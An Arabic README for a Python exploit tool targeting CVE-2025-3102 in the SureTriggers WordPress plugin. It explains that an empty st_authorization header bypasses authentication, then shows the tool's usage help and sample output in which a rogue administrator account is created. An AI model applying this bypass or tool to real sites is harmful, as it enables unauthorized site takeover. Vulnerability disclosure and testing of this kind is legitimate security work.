
Wordpress SureTriggers <= 1.0.78 - تجاوز صلاحية الوصول بسبب عدم التحقق من القيمة الفارغة يؤدي إلى إنشاء مستخدم إداري غير مصادق عليه
🚨 CVE-2025-3102 هي ثغرة أمنية حرجة لتجاوز المصادقة تؤثر على إضافة SureTriggers: منصة الأتمتة الشاملة لووردبريس، والمثبتة بنشاط على أكثر من 100,000 موقع. نظرًا لطبيعة الثغرة وحجم النشر، تشكل هذه الثغرة خطرًا أمنيًا كبيرًا.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:Hإضافة SureTriggers لووردبريس معرضة لـ تجاوز المصادقة الذي يسمح للمهاجمين غير الموثقين بإنشاء حسابات إدارية. يرجع ذلك إلى عدم التحقق من القيمة الفارغة على secret_key داخل دالة autheticate_user.
عند تثبيت الإضافة وتفعيلها ولكن بدون تكوين مفتاح API، يمكن للمهاجمين تجاوز المصادقة عن طريق إرسال رأس st_authorization فارغ، مما يؤدي إلى تشغيل إجراءات محجوزة للمستخدمين الموثقين.
يتم توفير سكريبت بايثون لأتمتة استغلال هذه الثغرة.
يتيح لك هذا السكريبت إنشاء مستخدم إداري جديد على المواقع الضعيفة.
readme.txtst_authorization فارغusage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: rHz0d
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
هذا السكريبت مقدم للأغراض التعليمية فقط.
الاستخدام غير المصرح به لهذا الكود ضد أهداف دون إذن صريح غير قانوني.
المؤلف لا يتحمل أي مسؤولية عن أي سوء استخدام أو ضرر ناتج.
من إعداد: rHz0d